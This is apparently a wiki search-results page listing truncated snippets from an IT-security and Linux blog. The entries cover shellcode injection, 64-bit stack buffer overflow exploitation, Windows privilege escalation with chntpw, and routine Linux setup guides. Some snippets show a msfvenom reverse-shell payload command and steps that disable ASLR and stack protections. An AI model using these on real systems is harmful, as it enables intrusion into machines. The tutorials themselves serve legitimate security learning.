Suche
Unten sind die Ergebnisse Ihrer Suche gelistet.
Volltextergebnisse:
- Shellcode Injection Part 1 @en:it-security:blog
- | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... rst we create the shellcode in raw format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... ll working}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Shellcode Injection Teil 1 @it-security:blog
- shell.c | Speichere in die Datei shell.c | <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... erstellen wir den Shellcode im Raw Format: <code bash> msfvenom -p windows/shell_reverse_tcp LHOST=172.... weiterhin}}] \\ \\ ===== Repository ===== <code bash> git clone https://github.com/psycore8/nosoc-shel
- Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
- docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... ion on Github in the Dependencies section. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... e check where the path to the ''libc'' is: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... find the offset for ''write()'' function: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
- Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
- ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... d so that memory areas are not randomised. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... return 0; } </code> \\ \\ === Compile === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... ugger and generate a 200-character string: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
- Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
- |kompilierte debug binary]] from the blog. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... verflow_x64|Part 1]], we also need ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== Deac... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... s, we start ropper and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a:
- Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
- ==== Now we can install ''chntpw'' using: <code bash> sudo apt install chntpw </code> \\ \\ ==== Find ... We are looking for the Windows partition. <code bash> sudo sfdisk -l </code> {{it-security:blog:scree... tion and create it in our $HOME directory. <code bash> mkdir ~/win </code> We then mount the partition. <code bash> sudo mount /dev/sda3 ~/win </code> Now we navig
- Buffer Overflow im 64-Bit Stack - Teil 1 @it-security:blog
- ithub.com/longld/peda/blob/master/README)) <code bash> git clone https://github.com/longld/peda.git ~/p... peicherbereiche nicht randomisiert werden. <code bash> echo 0 | sudo tee /proc/sys/kernel/randomize_va_... urn 0; } </code> \\ \\ === Kompilieren === <code bash> gcc -fno-stack-protector -z execstack bof.c -o b... enerieren einen 200 Zeichen langen String: <code bash> gdb -q vulnerable pattern_create 200 in.bin r <
- Buffer Overflow im 64-Bit Stack - Teil 2 @it-security:blog
- ompilierte Binary]] aus dem Blog debuggen. <code bash> br *vuln+73 # setze Breakpoint r < in.txt... w_x64|Teil 1]], benötigen wir noch ropper. <code bash> sudo apt install ropper </code> \\ \\ ===== ASLR... as base address as in the examples above. <code bash> gcc -fno-stack-protector -no-pie bof-part2.c -o ... ropper und lassen uns die Gadgets anzeigen <code bash> ropper --file bof-part2 ... 0x000000000040116a:
- Privilegien-Eskalation: Windows-Admin dank Linux @it-security:blog
- nnen wir ''chntpw'' installieren, mittels: <code bash> sudo apt install chntpw </code> \\ \\ ==== Windo... en ==== Wir suchen die Windows Partition. <code bash> sudo sfdisk -l </code> {{:it-security:blog:scre... ellen diesen in unserem $HOME-Verzeichnis. <code bash> mkdir ~/win </code> Anschließend mounten wir die Partition. <code bash> sudo mount /dev/sda3 ~/win </code> Nun navigier
- Buffer Overflow im 64-Bit Stack - Teil 3 @it-security:blog
- docs.pwntools.com/en/stable/install.html)) <code bash> python3 -m pip install --upgrade pip python3 -m ... t es eine modifizierte Version auf Github. <code bash> /dir/to/socat TCP-LISTEN:2323,reuseaddr,fork EXE... Wir prüfen, wo der Pfad zur ''libc'' ist: <code bash> ldd bof-part3 linux-vdso.so.1 (0x00007ff... den wir das Offset für ''write()'' heraus: <code bash> readelf -s /lib/x86_64-linux-gnu/libc.so.6 | gre
- NumLock in Kali dauerhaft aktivieren @linux
- * dconf-editor ===== Installation ===== <code bash> sudo apt install numlockx dconf-editor </code> ... itor setzen ==== * dconf-editor starten <code bash>dconf-editor</code> * navigiere zum Pfad <cod... aktiviert sein ===== Kommandozeile ===== <code bash> gsettings set org.gnome.desktop.peripherals.keyb
- n8n Installation mit Docker Compose @linux
- === 1.1 alte Versionen deinstallieren ==== <code bash> sudo apt-get remove docker docker-engine docker.... 1.2.1 Update apt und HTTPS aktivieren === <code bash> sudo apt-get update sudo apt-get install \ ... === 1.2.2 Docker GPG Key hinzufügen === <code bash> sudo mkdir -m 0755 -p /etc/apt/keyrings curl -fs... cker.gpg </code> === 1.2.3 Repo Setup === <code bash> echo \ "deb [arch=$(dpkg --print-architecture)
- Debian Fileserver mit Samba @linux
- n-linux/}} ===== Samba installieren ===== <code bash> fserve ~:# apt-get install samba Reading packag... . </code> ===== Anlegen der Gruppen ===== <code bash> fserve :~# addgroup smball fserve :~# addgroup ... </code> ===== Gruppenordner anlegen ===== <code bash> fserve :~# mkdir /home/groupsmball fserve :~# m... ion ===== ==== Konfiguration sichern ==== <code bash>fserve ~:# cp /etc/samba/smb.conf /etc/samba/smb.
- Manuelles OpenSSL Update @archiv:linux
- cken aufweist. ===== Vorbereitungen ===== <code bash> apt-get install autoconf python libtool build-es... de> ==== Herunterladen und Entpacken ==== <code bash> wget ftp://ftp.openssl.org/source/openssl-1.0.2i... Installation ===== ==== Kompilieren ==== <code bash> cd openssl-1.0.2i ./config --prefix=/usr zlib-dy... e make test sudo make sudo make install </code> ===== Testen ===== <code bash> openssl version </code>
- SCP und SFTP auf DiskStation (110j) @archiv:linux
- j** ===== Paketmanager installieren ===== <code bash> cat /proc/cpuinfo </code> Ausgabe: <code text>... ehle eingeben (Für Marvell Kirkwood CPUs): <code bash> cd /volume1/public wget http://ipkg.nslu2-linux.... al/sbin:/usr/local/bin export PATH </code> <code bash> reboot </code> ===== Pakete verwalten ===== <code bash>ipkg update</code> <code bash>ipkg install zlib</